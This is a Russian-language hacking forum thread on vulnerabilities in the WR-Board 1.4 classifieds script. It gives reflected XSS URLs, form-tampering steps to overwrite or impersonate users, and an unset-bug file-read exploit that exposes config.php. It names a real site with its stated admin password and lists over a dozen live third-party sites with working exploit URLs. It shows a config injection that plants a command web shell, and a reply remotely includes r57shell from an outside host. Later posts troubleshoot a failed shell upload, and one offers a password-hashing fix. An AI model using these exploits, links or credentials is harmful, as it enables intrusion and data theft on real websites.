PDA

Просмотр полной версии : Море уязвимостей в WR-Board 1.4


otmorozok428
01.05.2008, 02:09
На днях потестил доску объявлений WR-Board 1.4, представляю отчет о найденных глюках:

1. XSS

http://localhost/wrb/tools.php?event=viewfoto&foto='><script>alert()</script><'

http://localhost/wrb/tools.php?event=mailto&email=lelik@mail.ru&name=<script>alert()</script>&fid=21&id=14327

http://localhost/wrb/tools.php?event=mailto&email=lelik@mail.ru&name=LOH&fid=><script>alert()</script><&id=14327

http://localhost/wrb/tools.php?event=mailto&email=lelik@mail.ru&name=LOH&fid=21&id=><script>alert()</script><

К сожалению, все пассивные.


Есть активная XSS в cookies, параметр wrboardname

Otmorozok428<script>alert()</script>

Правда, при помощи неё можно утянуть только свои собственные куки. :)


2. Регистрация пользователя с уже существующим именем.

Хочу я, скажем, зарегистрировать юзера с ником Pupkin, а подлая борда говорит, что есть уже такой пользователь и обламывает процесс. Что делать? Регистрируем пользователя с ником, допустим, Vasya, идём на вкладку "Ваш профиль", открываем исходный код странички, ищем строчку

<FORM action='tools.php?event=reregistr' method=post>

и заменяем её на

<FORM action='http://localhost/tools.php?event=reregistr&ok=9' method=post>

Параметр 'ok=9' означает, что наш профиль после сохранения будет записан в девятую строчку от начала файла usersdat.php, где лежат профили всех юзеров, кроме админа. Профиль безвестного чувака, который лежит в девятой строчке, естественно, будет затерт - искусство требует жертв... Затем ищем ещё вот такую строчку

<input type=hidden name=login value='Vasya'>

и заменяем на

<input type=hidden name=login value='Pupkin'>

Сохраняем страничку на жесткий диск, открываем её оттуда и жмём кнопку "Сохранить изменения".

Всё, теперь в базе 2 пользователя с ником Pupkin. Если нужно, можно создать ещё. :)
Изменяя параметр ok от 0 до N, где N - количество пользователей, можно затереть всю базу, это будет DoS-атака...


3. Публикация сообщения от чужого имени.

Собственно, почти то же, что и в пункте 2, только не требуется добавление нового пользователя в базу и, соответственно, не надо затирать уже существующих юзеров. Выбираем пункт "Добавить объявление" и приводим 2 строчки в POST-формочке к такому виду

<FORM action='http://localhost/add.php?event=add&ok=1' method=post name=addForm enctype="multipart/form-data">

и

<input type=hidden name=name value='Pupkin'>


4. Просмотр произвольных файлов на сервере.

Существует возможность просмотра файлов, благодаря unset-багу для PHP4 < 4.4.3, PHP5 < 5.1.4. Подробнее про unset-уязвимость можно почитать, например, здесь:

http://forum.antichat.ru/thread54355.html

Смотрим код в файле index.php:

// ПОКАЗЫВАЕМ ТЕКУЩЕЕ ОБЪЯВЛЕНИЕ (ЛЕВЕЛ 3)
if (isset($_GET['fid']) and isset($_GET['id'])) { $fid=$_GET['fid'];

$error="Ошибка скрипта! Обратитесь к администратору - $adminemail";
$deleted="$back. Файл рубрики НЕ существует! Возможно администратор удалил данную рубрику.";
if (!isset($_GET['id'])) {print"$error"; exit;} $id=$_GET['id'];
if ($_GET['id']==="") {print "$error"; exit;}

if (is_file("$datadir/$fid.dat")) {$lines=file("$datadir/$fid.dat");}
$cy=count($lines)-1; $itogo=$cy; $i=$itogo;
if ($cy>=0) {unset($number); do {$dt=explode("|",$lines[$i]);
if ($dt[10]==$id) {$number=$i;} $i--;} while ($i >= 0);}

if (!isset($number)) {include "$topurl"; addtop(); print"<BR><BR><BR><BR><BR><center><font size=-1><B>Уважаемый

посетитель!</B><BR><BR>
Извините, но запрашиваемое Вами <B>объявление недоступно.</B><BR><BR>
Скорее всего, <B>закончился срок его показа</B>, и оно было удалено с доски.<BR><BR>
Вы можете <B><a href='index.php?fid=$fid'>перейти в раздел</a></B> где было размещено объявление.<BR>
Возможно, Вы найдёте похожее объявление в этом разделе.<BR><BR>
<B>Перейти на главную</B> страницу доски можно по <B><a href='index.php'>этой

ссылке</a></B><BR><BR><BR><BR><BR><BR><BR><BR><BR>";

} else {

...................................
какие-то действия
...................................

if (is_file("$datadir/$id.dat")) {

$rlines=file("$datadir/$id.dat");
................................
................................
}}

Видим, что если переменная $number инициализирована, имеется возможность запихнуть в качестве переменной $id имя какого-нибудь файла. При этом переменная $id вообще никак не фильтруется, а глючный кусок кода то ли остался от предыдущих версий, то ли используется в платной версии, но в версии Lite при штатной работе он вообще никак не задействован.

Далее, бежим на

http://lukasz.pilorz.net/testy/zend_hash

и по быстрому вычисляем хеши для переменной $number, они такие

-305479930 для PHP4
807219790 для PHP5

Теперь, пробуем создавать действительно правильные запросы... Скрипт, конечно, будет очень сильно материться, но выполняться... Смотрим содержимое файла newmsg.dat

http://localhost/index.php?fid=2&id=newmsg&number=-305479930&-305479930=2 //PHP4

http://localhost/index.php?fid=2&id=newmsg&number=807219790&807219790=2 //PHP5


Получаем, содержимое файла usersdat.php:

http://localhost/index.php?fid=2&id=usersdat.php%00&number=-305479930&-305479930=2 //PHP4

http://localhost/index.php?fid=2&id=usersdat.php%00&number=807219790&807219790=2 //PHP5

Посмотрим файлик config.php (здесь, кстати, лежит админский пасс)

http://localhost/wrb/index.php?fid=2&id=../config.php%00&number=-305479930&-305479930=2 //для PHP 4

http://localhost/wrb/index.php?fid=2&id=../config.php%00&number=807219790&807219790=2 //для PHP5

Короче, unset-баг самый вкусный... К сожалению, на все 100% заюзать баг мне удалось только здесь:

http://city-45.ru/board/index.php

Админский пасс: krot_2002

Вообще же, мне удалось обнаружить большое количество сайтов, где unset-бага достаточно успешно работает, но %00 почему-то не катит... Например,

http://www.board.lobnya.biz/index.php?fid=2&id=usersdat.php%00&number=-305479930&-305479930=1

http://viaduk.podolchanin.ru/index.php?fid=2&id=newmsg&number=807219790&807219790=2

http://www.koap.ru/do/index.php?fid=2&id=newmsg&number=-305479930&-305479930=2

http://kupi-prodam.hut2.ru/index.php?fid=9&id=newmsg&number=-305479930&-305479930=2

http://kotlassdelka.ru/index.php?fid=98&id=newmsg&number=-305479930&-305479930=1

http://www.disv.ru/board/index.php?fid=4&id=newmsg&number=-305479930&-305479930=2

http://www.doska777.org.ua/index.php?fid=2&id=newmsg&number=-305479930&-305479930=2

http://www.stupino.org/board/index.php?fid=3&id=newmsg&number=-305479930&-305479930=2

http://kat.3vr.ru/board/index.php?fid=4&id=newmsg&number=-305479930&-305479930=2

http://www.rozavetrov.biz/board/index.php?fid=7&id=newmsg&number=-305479930&-305479930=2

http://doska.magek.ru/index.php?fid=4&id=newmsg&number=-305479930&-305479930=2

http://www.57.org.ua/index.php?fid=9&id=newmsg&number=-305479930&-305479930=2

http://www.5825200.ru/board/index.php?fid=2&id=newmsg&number=-305479930&-305479930=2

Если, кто-нить знает что не так с %00, отпишитесь, плз...


Заключение: Получение шелла

Идем в админку (файл admin.php), логинимся с админским пассом из файла config.php, заходим на вкладку "Конфигурация" и в пункте "Относительный путь до папки с данными доски" прописываем

./data"; if (isset($_GET['cmd'])){system($_GET['cmd']);}//
Сохраняем конфигурацию. Всё, шелл готов к работе!

*****

KeynDark
03.05.2008, 15:54
Удобней так:
./data";include $_GET["inc"];//

Инклюдим шел:
www.test.ua/board/index.php?inc=http://site.ua/r57shell.txt

Пока всё :)

[Raz0r]
03.05.2008, 16:28
При добавлении нового пользователя, параметр $_SERVER['REMOTE_ADDR']; в скрипте tools.php не проверяется на наличие символа прямой черты |
0_o а каким образом ты REMOTE_ADDR собрался изменять???
Вообще же, мне удалось обнаружить большое количество сайтов, где unset-бага достаточно успешно работает, но %00 почему-то не катит...
Не катит, потому что на тех сайтах включен magic_quotes_gpc, который экранирует нулл байт

otmorozok428
04.05.2008, 13:15
0_o а каким образом ты REMOTE_ADDR собрался изменять???

Сорри, действительно не получится - убрал этот пункт...

За magic_quotes_gpc - спасибо, что оно нуль-байт тоже режет не знал...

Dr.Frank
04.05.2008, 14:31
Если кому интересно, как вариант от заливки шелла(а точнее от получения пароля админа путем прочтения файла config.php) поможет md5-хеширование пароля админа.

В файле config.php меняем $password=пароль на $password=хеш_от_пароля.
Файл admin.php переделанный для работы с хешем тут -> http://rapidshare.com/files/112438256/admin.zip.html

omel
12.01.2009, 00:35
Удобней так:
./data";include $_GET["inc"];//
Нужна помощь есть пароль на админку и нужно залить шел... пробовал по этому методу не идет. :confused: Вот что пишет:
Warning: fopen(config.php) [function.fopen]: failed to open stream: Permission denied in /usr/home/------/admin.php on line 1347
Warning: flock() expects parameter 1 to be resource, boolean given in /usr/home/------/admin.php on line 1349
Warning: ftruncate(): supplied argument is not a valid stream resource in /usr/home/------/admin.php on line 1351
Warning: fputs(): supplied argument is not a valid stream resource in /usr/home/------/admin.php on line 1353
Warning: fflush(): supplied argument is not a valid stream resource in /usr/home/------/admin.php on line 1355
Warning: flock() expects parameter 1 to be resource, boolean given in /usr/home/------/admin.php on line 1357
Warning: fclose(): supplied argument is not a valid stream resource in /usr/home/------/admin.php on line 1359
Warning: Cannot modify header information - headers already sent by (output started at /usr/home/------/admin.php:1347) in /usr/home/------/admin.php on line 1365

KyMPaH
27.01.2009, 17:49
Нужна помощь есть пароль на админку и нужно залить шел... пробовал по этому методу не идет. :confused: Вот что пишет:
Warning: fopen(config.php) [function.fopen]: failed to open stream: Permission denied in /usr/home/------/admin.php on line 1347
Warning: flock() expects parameter 1 to be resource, boolean given in /usr/home/------/admin.php on line 1349
Warning: ftruncate(): supplied argument is not a valid stream resource in /usr/home/------/admin.php on line 1351
Warning: fputs(): supplied argument is not a valid stream resource in /usr/home/------/admin.php on line 1353
Warning: fflush(): supplied argument is not a valid stream resource in /usr/home/------/admin.php on line 1355
Warning: flock() expects parameter 1 to be resource, boolean given in /usr/home/------/admin.php on line 1357
Warning: fclose(): supplied argument is not a valid stream resource in /usr/home/------/admin.php on line 1359
Warning: Cannot modify header information - headers already sent by (output started at /usr/home/------/admin.php:1347) in /usr/home/------/admin.php on line 1365

Что конкретно не идёт? Не инклудит или вообще не сохраняет новые настройки в админке? Если не сохраняет настройки в админке - забей на этот сайт, у веб-сервера нет прав на запись в файл с настройками. Данным методом залить шелл на сайт не получится.

omel
03.02.2009, 01:11
я так и понял что нифига не будет...